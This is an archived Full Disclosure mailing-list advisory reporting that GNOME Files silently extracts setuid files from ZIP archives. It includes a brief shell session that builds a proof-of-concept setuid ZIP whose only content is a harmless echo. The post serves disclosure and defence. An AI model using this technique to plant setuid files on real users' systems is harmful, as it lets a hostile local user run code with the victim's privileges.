[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] GNOME Files silently extracts setuid files from ZIP archives
From: Georgi Guninski <gguninski () gmail ! com>
Date: 2023-08-05 10:32:17
Message-ID: CAGUWgD-0S50mb19Kj=BWRunMXw0oS-TCdv505N+NtsoFYNpFWw () mail ! gmail ! com
[Download RAW message or body]
Affected: GNOME Files 43.4 (nautilus) on fedora 37
Description:
If an user A opens in GNOME files zip archive containing
`setuid` file F, then F will be silently extracted to
a subdirectory of CWD.
If F is accessible by hostile local user B and B executes F,
then F will be executed as from user A.
tar(1) and unzip(1) are not vulnerable to this attack.
Session for creating the ZIP.
After that just open f.zip in GNOME files.
<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive: f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic